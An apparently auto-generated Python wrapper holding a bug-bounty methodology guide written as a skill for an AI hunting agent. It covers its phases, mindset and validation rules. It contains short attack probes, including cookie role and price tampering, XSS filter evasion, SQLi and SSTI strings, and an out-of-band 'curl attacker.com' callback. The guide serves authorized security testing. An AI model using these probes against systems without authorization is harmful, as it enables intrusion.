#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
AUTO-GENERATED from Cybermes skill: claude-bughunter/bb-methodology

Skill: Bug Bounty Methodology: Workflow + Mindset
Desc : Use at the START of any bug bounty hunting session, when switching targets, or when feeling lost about what to do next. Master orchestrator that combines the 5-phase non-linear hunting workflow with the critical thinking framework (developer psychology, anomaly detection, What-If experiments). Routes to all other skills based on current hunting phase. Also use when asking "what should I do next" or "where am I in the process.

Run:  python claude-bughunter-bb-methodology.py --help
      python claude-bughunter-bb-methodology.py --list
      python claude-bughunter-bb-methodology.py --dump <section>
"""
import sys, json, argparse

NAME = 'claude-bughunter/bb-methodology'
TITLE = 'Bug Bounty Methodology: Workflow + Mindset'
DESCRIPTION = 'Use at the START of any bug bounty hunting session, when switching targets, or when feeling lost about what to do next. Master orchestrator that combines the 5-phase non-linear hunting workflow with the critical thinking framework (developer psychology, anomaly detection, What-If experiments). Routes to all other skills based on current hunting phase. Also use when asking "what should I do next" or "where am I in the process.'

PAYLOADS = {
    'main': ["name: bb-methodology", "description: Use at the START of any bug bounty hunting session, when switching targets, or when feeling lost about what to do next. Master orchestrator that combines the 5-phase non-linear hunting workflow with the critical thinking framework (developer psychology, anomaly detection, What-If experiments). Routes to all other skills based on current hunting phase. Also use when asking \"what should I do next\" or \"where am I in the process.\""],
    'bug-bounty-methodology-workflow-mindset': ["Master orchestrator for hunting sessions. Combines the 5-phase non-linear workflow with the critical thinking framework that separates top 1% hunters from the rest."],
    'part-0-mode-confirmation-before-anything-else': ["**Confirm the engagement type before deciding what counts as a finding.** The same target produces a different report shape depending on which mode applies. Getting this wrong is the single biggest waste of time in this workflow \u2014 answer it explicitly before Phase 0.", "**Hard rule:** Before Phase 0 runs, write the engagement type as the first line in your hunt notes. If you can't answer it from the user's instruction, ASK once. Don't assume \u2014 the mistake costs both you and the triager.", "**Lesson from an authorized engagement:** First-pass on this target produced 5 hygiene findings (SP2013 EoL, permissive CSP, stack traces) shipped in red-team format. The engagement was bug-bounty. Findings would have been N/A'd as \"informational, no impact demonstrated.\" After the corrected pass with hygiene-as-context-not-finding, the same target yielded 11 impact-demonstrated bugs including 3 Critical."],
    'part-1-mindset-how-to-think': [],
    'core-principle': ["Hunting is not \"find a bug\" -- it is \"prove an attack scenario.\" Think like an attacker with a specific goal, not a scanner looking for patterns."],
    'daily-discipline-define-select-execute': ["Before touching any tool:", "1. **Define**: \"Today I target [feature/domain] to achieve [CIA impact]\"", "2. **Select**: Choose 1-2 vuln classes (IDOR, Race Condition, etc.)", "3. **Execute**: Focus ONLY on selected techniques. No wandering."],
    '5-ultimate-goals-pick-one-per-session': ["1. **Confidentiality** -- steal data the attacker shouldn't see", "2. **Integrity** -- modify data the attacker shouldn't change", "3. **Availability** -- disrupt service (app-level DoS only)", "4. **Account Takeover** -- control another user's account", "5. **RCE** -- execute commands on the server"],
    '4-thinking-domains': [],
    '1-critical-thinking-deep-analysis': ["**Question trust boundaries:**", "- Frontend control disabled? Send request directly via proxy", "- `user_role=user` cookie? Change to `admin`", "- `price=1000` in POST? Change to `1`", "- `<script>` blocked? Try `<img onerror=...>`", "**Reverse-engineer developer psychology:**", "- Feature A has auth checks -> Similar feature B (newly added) probably doesn't", "- Complex flows (coupon + points + refund) -> Edge cases have bugs", "- `/api/v2/user` exists -> Does `/api/v1/user` still work with weaker auth?", "**What-If experiments:**", "- Skip checkout -> hit `/checkout/success` directly", "- Skip 2FA -> navigate to `/dashboard`", "- Send coupon request 10x simultaneously -> Race condition?", "- Replace `guid=f8a2...` with `id=100` on sibling endpoint -> IDOR?"],
    '2-multi-perspective-multiple-angles': [],
    '3-tactical-thinking-pattern-detection': ["- **Naming anomaly**: `userId` everywhere but suddenly `user_id` -> different dev, weaker security", "- **Error diff**: Same 403 but different JSON structure -> different backend systems", "- **Environment diff**: Prod vs Dev/Staging -> debug headers, CSP disabled", "- **Version diff**: JS file before/after update -> new endpoints, removed params", "- **Supply chain**: Check framework/library versions for known CVEs", "- **Third-party integration**: Stripe/Auth0/Intercom -> webhook signature missing?"],
    '4-strategic-thinking-big-picture': ["- **Asymmetry**: Defender must patch ALL holes. You only need ONE.", "- **Intuition engineering**: Log why something \"feels wrong.\" Verify later. Update mental DB.", "- **Unknown management**: Can't understand something? Add to \"investigate later\" list. Just-in-Time Learning."],
    'amateur-vs-pro-7-phase-comparison': [],
    'two-approach-routes': ["- **Route A (Feature-based)**: \"This feature is complex\" -> deep-dive its input handling -> find vuln", "- **Route B (Vuln-based)**: \"I want IDOR\" -> find endpoints with sequential IDs -> test access control"],
    'anti-patterns-stop-doing-these': ["- **Program hopping**: Stick with one target minimum 2 weeks / 30 hours", "- **Tool-only hunting**: Automation finds duplicates. Manual testing finds unique bugs.", "- **Rabbit hole**: Max 45 min per parameter. Set a timer. If stuck, sleep on it.", "- **No goal**: \"Just looking around\" = wasted time. Always Define first."],
    'part-2-workflow-what-to-do': [],
    'the-5-phase-non-linear-flow': ["+-------------------------------------------------+", "+-------------------------------------------------+", "**THIS IS NOT LINEAR.** Move freely between phases. When stuck, return to a previous phase."],
    'phase-0-session-start-every-time': ["**Before touching any tool, answer these:**", "1. **Define**: \"Today I target [feature/domain] to achieve [C/I/A/ATO/RCE]\"", "2. **Select**: Choose 1-2 vuln classes (IDOR, XSS, SSRF, etc.)", "3. **Execute**: Focus ONLY on selected techniques", "**Route selection -- Wide or Deep?**"],
    'phase-1-recon': ["**Goal**: Maximize attack surface. Find what others missed.", "**Wide approach** (initial sweep):", "Subdomain enum -> DNS resolution -> HTTP probing -> Port scan -> Tech detect", "**Deep approach** (targeted):", "Google Dorks -> JS file download -> Hidden param discovery -> API mapping", "**Command**: `/recon target.com`"],
    'phase-2-mapping-analysis': ["**Goal**: Understand the app like its developer does.", "**Checklist:**", "- [ ] Map all endpoints (Burp/Caido sitemap + JS analysis)", "- [ ] Identify auth model (cookie, JWT, OAuth, SAML?)", "- [ ] Find business-critical flows (payment, registration, password reset, data export)", "- [ ] Download and analyze JS files for hidden routes, secrets, logic", "- [ ] Identify roles and permissions (user, admin, API keys)", "- [ ] Note \"weird\" behaviors (anomalies in naming, errors, timing)"],
    'phase-3-vulnerability-discovery': ["**Goal**: Find the bug. Use Error-based first, then Blind-based.", "**Decision flow based on what you're testing:**", "What input are you testing?", "+-- ID parameter (user_id, order_id)", "+-- Search/filter/sort field", "+-- URL input / webhook / PDF gen", "+-- Text field reflected in page", "+-- File upload", "+-- Price/quantity/coupon", "+-- Login / 2FA / password reset", "+-- Profile update API", "+-- Template / wiki editor", "+-- Nothing obvious", "-> Fuzz with ffuf, try Error-based probing", "**Error vs Blind decision:**", "1. Try Error-based first (send `'`, `\"`, `{{7*7}}`, `${7*7}`) -- watch for 500 errors, stack traces", "2. No error? Time-based (`SLEEP(10)`, `; sleep 10;`) -- watch response time", "3. No time diff? OOB (`curl attacker.com`, interactsh) -- watch for DNS callback", "4. Still nothing? Boolean (`AND 1=1` vs `AND 1=0`) -- watch content-length diff"],
    'phase-4-prove-escalate': ["**Goal**: Prove maximum business impact. Turn Low into Critical.", "**Escalation decision:**", "What did you find?", "+-- XSS", "+-- IDOR", "+-- SSRF", "+-- SQLi", "+-- Open Redirect", "+-- Blocked by defense", "+-- Low-impact, can't escalate alone", "-> Find connector gadget for chain", "**After proving impact, check:**", "- [ ] Can attack work with 0-1 clicks? (minimize prerequisites)", "- [ ] Does it affect all users or specific role?", "- [ ] What's the business $ impact?"],
    'phase-5-validate-report': ["**Goal**: Get paid. Make triager's job easy.", "**Pre-report gate:**", "Run /validate (7-Question Gate)", "+-- All 7 pass? -> Write report", "+-- Any fail? -> KILL the finding. Don't waste time.", "+-- Borderline? -> Run /triage for quick go/no-go", "**Multi-Tool Reproduction Bar (Critical / High only):**", "Before labeling a finding **Critical** or **High**, reproduce it via at least **two independent tools** (different stacks, different HTTP libraries). Cross-tool consistency rules out tool-artefact findings (e.g., a curl-only timing differential that disappears under Python `requests` was an artefact, not a bug).", "Examples of independent reproductions:", "- `curl` + Burp `send_http1_request` (different TLS stacks, different header normalisation)", "- Python `requests` + raw socket via `ssl.wrap_socket` (one library normalises, one doesn't)", "- Burp Repeater + Python `urllib` (same wire result expected from both)", "The reproduction commands MUST be paste-into-shell ready in the report \u2014 a triager copies them verbatim. If the curl version requires special flags or breaks on certain systems, include a Python alternative.", "**Lesson from an authorized engagement:** All three Critical findings (Authentication.asmx brute-force, TE.CL smuggling, NTLM Type-2 disclosure) were each independently reproduced via curl + Python raw sockets + Burp tooling. The cross-tool consistency was what convinced the triage write-up that the findings were not artefacts.", "**Report:**", "Run /report", "+-- Platform-specific format (H1/Bugcrowd/Intigriti/Immunefi)", "+-- Title: [Bug Class] in [Endpoint] allows [role] to [impact]", "+-- Impact-first summary (sentence 1 = what attacker CAN do)", "+-- Exact HTTP requests in Steps to Reproduce", "+-- Under 600 words", "+-- CVSS 3.1 score that MATCHES actual impact", "**After submission:**", "- [ ] While waiting for triage: try to escalate further (A->B signal method)", "- [ ] If fix deployed: re-test for bypass (incomplete patch = new bug)", "- [ ] Record finding with `/remember` for hunt memory"],
    'part-3-navigation-timing': [],
    'non-linear-navigation-quick-reference': [],
    '20-minute-rotation-clock': ["Every 20 minutes ask yourself: **\"Am I making progress?\"**", "- Yes -> Continue", "- No -> Rotate to next: endpoint -> subdomain -> vuln class -> target", "- Been on same target 2+ weeks with no findings? -> Consider switching program"],
    'pushback-protocol-when-the-user-says-find-more': ["When the user disagrees with your stopping point \u2014 e.g., \"I've found 10+ bugs, you should find the same,\" or \"look harder,\" or \"you're missing things\":", "**Default assumption: they are correct. You stopped early.**", "Before pushing back with \"I think we're done because X,\" do this:", "1. **Re-read 3 more `hunt-*` skills** beyond what you have loaded. Pick ones that match observed surface (e.g., custom login \u2192 `hunt-auth-bypass`; SOAP endpoints \u2192 look for protocol-specific skills; URL parameters \u2192 `hunt-ssrf`).", "2. **Re-attack the same surface** with the new skill checklists. Walk every step in the new skills, even if it feels redundant.", "3. **Document negatives** as you go \u2014 a confirmed \"no bug here\" is itself a finding for the user to see (it proves coverage).", "4. **Only after exhausting 3 new skills' checklists** do you push back, and only with a concrete list of what was tested.", "**Lesson from an authorized engagement:** After a first-pass of 5 weak findings the user said \"I have 10+, find them.\" Loading `hunt-auth-bypass` (which had been loaded but not walked through end-to-end) immediately surfaced the `/_vti_bin/Authentication.asmx` legacy SOAP login \u2014 the highest-impact bug in the engagement. The user was right; pushback would have been wrong."],
    'tool-routing-by-phase': [],
    'session-end-checklist': ["- [ ] Save all Burp/Caido project files", "- [ ] Record any \"weird but not yet exploitable\" behaviors (future gadgets)", "- [ ] Update notes with failed attempts (don't re-test with same techniques)", "- [ ] Log findings with `/remember`"],
    'part-4-methodology-discipline-false-positive-prevention': ["Most retracted findings come from four recurring process bugs. Each has a hard rule."],
    'marker-discipline': ["When testing for reflection, cache poisoning, parameter pollution, or OOB SSRF, the marker string you inject MUST be unique and unmistakable.", "**Rules:**", "- Markers are random alphanumeric strings, **8+ characters**, no English words, no protocol keywords.", "- **NEVER** use `test`, `marker`, `evil`, `attacker`, `payload`, `javascript`, `script`, `AAAA`, `BBBB`, your domain name, or any string that could plausibly appear naturally in the target's HTML/JS/error messages.", "- **Good markers:** `cpmark987abc`, `x4hd2k9pq`, a Collaborator subdomain prefix like `dlsrcurl.<collab>.oastify.com`, or `__ZZ_MARKER_<random>_ZZ__`.", "- Before claiming reflection: search the **baseline** (no-marker) response for the marker string. If it appears naturally, change your marker. This single check catches 80% of false-positive reflection reports.", "- For OOB testing, sub-tag each Collaborator payload (e.g., `dlsrcurl.<collab>`, `authsrc.<collab>`) so callbacks identify the specific sink that fired.", "**Lesson from an authorized engagement:** Initial scan flagged `X-Forwarded-Proto: javascript` as reflecting into multiple SharePoint pages. The \"reflection\" was the literal word `javascript` appearing naturally in SP help-link hrefs (`href=\"javascript:HelpWindowKey(...)\"`). False positive caused by a non-unique marker."],
    'body-diff-rule': ["A bypass claim requires response **body** differential, not just status code.", "**Rules:**", "- 200 OK with byte-identical body to the baseline is NOT a bypass.", "- 200 OK with a 5-byte difference might be \u2014 verify what changed (correlation ID? timestamp? real content?).", "- Always diff the body side-by-side before claiming bypass: `diff <(curl ... baseline) <(curl ... bypass)`.", "- Status-code-only claims (e.g. \"Host header X gave 200 instead of 403\") are the most common rejected-as-N/A category on bug bounty platforms.", "**Lesson from an authorized engagement:** `Host: target.example:80@evil.example.com` returned HTTP 200 instead of the baseline 403. Looked like a Host-header bypass. But the body was byte-identical (8341 bytes both) \u2014 the AWS ELB normalised the Host to `target.example:80`, dropping the `@evil` portion. Not a bypass."],
    'statistical-sample-rule-for-timing-based-claims': ["Single outliers are NOT signal. Network jitter routinely produces 2\u00d7 outliers.", "**Rules for any user-enum / blind-SQLi / blind-NoSQLi / timing-side-channel claim:**", "- Minimum sample size: **n \u2265 10 INTERLEAVED trials per group** (control + test, randomised order, not back-to-back).", "- Compute mean, median, \u03c3 for each group.", "- A signal requires the suspect group's mean to be **\u2265 2\u03c3 above** the control group's mean.", "- A single 2\u00d7 outlier in n=1 testing is jitter, not signal.", "**Lesson from an authorized engagement:** Single-shot probe showed `Administrator` taking 1527 ms vs ~700 ms control on Authentication.asmx Login \u2014 looked like clear user-enum signal. Reproduction with n=80 interleaved trials across 8 groups collapsed every group to mean=685-716 ms, \u03c3=25-74 ms. The 1527 ms was network jitter. Finding retracted."],
    'shell-loop-ban-5-iterations': ["For any iteration that runs more than 5 times, **use Python (with try/except per iteration), not shell for-loops.**", "**Why:** zsh array expansion fails silently on edge cases. A loop like `for x in \"${arr[@]}\"` can produce zero iterations with no error if the array wasn't populated by the previous command. The user sees output that looks complete but actually skipped the test entirely.", "**Rules:**", "- Loops of \u22645 hardcoded items in shell: OK.", "- Anything that iterates a list, file, or computed range: Python.", "- Always count results. If you expected 100 probes and got <50 lines of output, your loop ate something.", "**Lesson from an authorized engagement:** A zsh array-iteration verb-tampering test silently produced no curl invocations across 20+ iterations (zsh ate the array). Output looked like \"HIT [GET] /_api/web \u2192 \" repeated for every probe but the actual response was missing. ~50 probes worth of testing lost. Switching the test to Python with explicit per-iteration logging surfaced the real results."],
    'related-skills-chains': ["- **`hunt-dispatch`** \u2014 When PART 0 mode is confirmed (redteam / wapt + blackbox|greybox). Workflow primitive: after the engagement-type answer is locked, hand off to `hunt-dispatch` to fingerprint the target and load the matching platform + hunt-* skill set; this skill stops being the active context once dispatch prints its taxonomy.", "- **`bug-bounty`** \u2014 When the user asks a generic \"what should I do\" or starts a new target. Workflow primitive: `bug-bounty` is the orchestrator that names which `hunt-*` skills to load by topic; this skill (`bb-methodology`) provides the 5-phase workflow that orchestrator runs against.", "- **`triage-validation`** \u2014 When a finding completes Phase 4 and is about to be written up. Workflow primitive: Phase 5 explicitly calls `/validate` (the 7-Question Gate); only findings that pass all 7 questions get handed off to `report-writing`.", "- **`offensive-osint`** + **`web2-recon`** \u2014 When Phase 1 (Recon) is active. Workflow primitive: Phase 1's \"Wide approach\" delegates to `offensive-osint` for asset arsenal and `web2-recon` for the live-host + URL pipeline."],
    'operator-notes-claude-bughunter': [],
    'what-the-methodology-doesn-t-tell-you': ["The vendored 5-phase workflow is a checklist; real engagements are improvisation. Sometimes you skip phases entirely \u2014 a client hands you a single URL and a JWT, recon was already done by their internal team, and Phase 1 collapses to a 10-minute fingerprint. Sometimes you spend 80% of the engagement in Phase 1 because the scope is a 200-asset financial-services parent org and asset discovery IS the work. The methodology is a map of terrain that exists in every engagement, not a sequence you traverse uniformly."],
    'mode-confirmation-in-practice': ["PART 0 (the bug-bounty vs WAPT vs red-team gate at the top of this file) is a hard rule, but the answer isn't always handed to you. Read the scope language:", "- **\"in-scope assets\"** + **\"out-of-scope assets\"** + **\"safe harbor\"** \u2192 bug-bounty discipline. Validation-heavy, OOB-required, no exfil.", "- **\"kill chain\"** + **\"objectives\"** + **\"flag capture\"** + **\"adversary emulation\"** \u2192 red-team. Stealth, persistence, lateral movement valid.", "- **\"compliance\"** + **\"PCI\"** + **\"HIPAA\"** + **\"executive report\"** + **\"remediation timeline\"** \u2192 WAPT. Coverage-driven, deliverable-focused, all findings count regardless of exploitability.", "When the language is mixed (common \u2014 clients often write WAPT-shaped SOWs and call them red-team engagements), default to bug-bounty discipline until proven otherwise. It's the most validation-strict mode; you can always relax later if the client confirms red-team. The reverse \u2014 assuming red-team latitude on what turns out to be a WAPT \u2014 gets findings retracted at delivery."],
    'phase-priority-shifts-by-target-type': ["The 5 phases are not equal-weight. Engagement type dictates the time allocation:", "If you find yourself spending 50% of a SaaS bug-bounty engagement in recon, you're procrastinating on the hunt. If you're spending 10% of an external red-team engagement on recon, you've already lost \u2014 the attack surface map IS the deliverable on those."],
    'when-to-break-the-methodology': ["If you find a Critical in the first 30 minutes of recon, **stop reconning, validate the Critical fully, report it, then return to recon.** The methodology says \"complete the phase before moving on\" \u2014 the value-per-hour curve disagrees. A confirmed Critical paying out within 24h of engagement start is worth more than a comprehensive asset list you'll never get to chain.", "The same applies in reverse: if you've been hunting a candidate for 4+ hours and it won't reproduce on a second account, the candidate is dead. Don't sink another 4 hours into making a dead candidate reproduce. Drop it, document the retraction in your notes, move on."],
    'the-discipline-rules-are-non-negotiable': ["The discipline rules in this file \u2014 OOB Gate, Marker Discipline, Body-Diff Rule, Statistical-Sample Rule, Server-Policy-vs-State, Pre-Severity Gate, Shell-Loop Ban \u2014 are not methodology. They are quality gates. Methodology is the order of operations; these are the validation guarantees at each step.", "Verified across Phase 2D's hardened-lab campaign: 8/8 discipline rules fired correctly against fake-bug-shaped behavior (URL echo dressed as XSS, word collision dressed as reflection, status-code-only \"bypasses\" with byte-identical bodies, 200-OK leak-claims with no actual leak data). Validation rates fall sharply when these rules get skipped. The friction is the feature \u2014 if a rule feels obstructive, that's it doing its job. The findings it kills are the half that would have come back N/A anyway.", "- **`evidence-hygiene`** \u2014 When Phase 5 is collecting PoC screenshots / HARs. Workflow primitive: before any cookie / PII appears in a screenshot, hand off to `evidence-hygiene` for the redaction protocol."],
}

def main():
    ap = argparse.ArgumentParser(description=DESCRIPTION, formatter_class=argparse.RawDescriptionHelpFormatter)
    ap.add_argument("--list", action="store_true", help="list sections")
    ap.add_argument("--dump", metavar="SECTION", help="dump payloads for a section")
    ap.add_argument("--search", metavar="KEYWORD", help="search payloads")
    args = ap.parse_args()
    if args.list or not (args.dump or args.search):
        print("=== %s ===" % TITLE)
        print(DESCRIPTION)
        print()
        print("Sections (%d):" % len(PAYLOADS))
        for k in PAYLOADS:
            print("  -", k, "(%d payloads)" % len(PAYLOADS[k]))
        if args.list:
            return
    if args.dump:
        if args.dump not in PAYLOADS:
            print("Section not found. Available:", list(PAYLOADS.keys()))
            sys.exit(1)
        for p in PAYLOADS[args.dump]:
            print(p)
        return
    if args.search:
        q = args.search.lower()
        hits = 0
        for k, v in PAYLOADS.items():
            for p in v:
                if q in p.lower():
                    print("[%s] %s" % (k, p))
                    hits += 1
        print("\n%d hits" % hits)
        return

if __name__ == "__main__":
    main()